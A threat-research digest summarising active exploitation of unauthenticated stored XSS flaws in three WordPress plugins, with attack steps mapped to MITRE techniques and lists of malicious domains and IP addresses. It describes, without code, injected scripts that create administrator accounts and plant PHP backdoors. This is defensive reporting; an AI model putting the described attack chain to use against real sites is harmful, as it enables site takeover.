Threat Research

Active exploitation of unauthenticated stored XSS vulnerabilities in WordPress Plugins

Cyware

Active exploitation attempts target three high-severity WordPress CVEs (CVE-2024-2194, CVE-2023-6961, CVE-2023-40000) via unauthenticated stored XSS in plugins. Attackers load an external obfuscated JavaScript file to perform actions such as creating admin accounts, injecting backdoors, and tracking infections; notable infrastructure includes Dutch-origin traffic and multiple domains used in payloads. #CVE-2024-2194 #CVE-2023-6961 #CVE-2023-40000 #WPStatistics #WPMetaSEO #LiteSpeedCache #media.cdnstaticjs.com #cloud.cdndynamic.com #assets.scontentflow.com

Keypoints

  • Three WordPress plugin vulnerabilities (CVE-2024-2194, CVE-2023-6961, CVE-2023-40000) are being actively exploited via unauthenticated stored XSS.
  • Attackers inject a script tag that points to an external, obfuscated JavaScript file used across all three CVEs.
  • The malicious JavaScript payloads perform three main actions: inject backdoors, create a new administrator account, and set up tracking scripts.
  • Exploitation activity originates from IPs associated with IP Volume Inc and shows a Netherlands concentration; several domains are used in payloads and tracking.
  • Indicated domains and tracking infrastructure include media.cdnstaticjs.com, idc.cloudiync.com, cloud.cdndynamic.com, cdn.mediajsdelivery.com, assets.scontentflow.com, and cache.cloudswiftcdn.com.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attack targets unauthenticated stored XSS vulnerabilities in WordPress plugins to inject scripts via the URL search parameter. [“The vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the URL search parameter.”]
  • [T1136] Create Account – The payload creates a new administrator account. [“Creating a New Administrator Account: Sends a request to the server’s WordPress installation to create a new administrator account”]
  • [T1505.003] Web Shell – Malicious PHP backdoors injected into plugin and theme files for persistence. [“Injects Malicious PHP Backdoors: Into plugin files; Into theme files.”]
  • [T1059.007] JavaScript – The attack uses JavaScript to deliver payloads, load external scripts, and execute actions in the victim’s browser. [“The contents of the malicious JavaScript perform the following actions:”]
  • [T1027] Obfuscated/Compressed Files and Information – The JavaScript payload is obfuscated to conceal its actions. [“obfuscated JavaScript file hosted on an external domain.”]
  • [T1041] Exfiltration Over C2 Channel – The malware tracks infected hosts and reports data to callback domains. [“Tracks infected hosts by capturing their HTTP host information.”]

Indicators of Compromise

  • [Domains] – The exploitation domains include media.cdnstaticjs.com, cloud.cdndynamic.com, idc.cloudiync.com, cdn.mediajsdelivery.com, go.kcloudinc.com, assets.scontentflow.com, cache.cloudswiftcdn.com
  • [IP Addresses] – Example compromised traffic sources include 80.82.76.214, 31.43.191.220, 94.102.51.144, and several others

Read more: https://www.fastly.com/blog/active-exploitation-unauthenticated-stored-xss-vulnerabilities-wordpress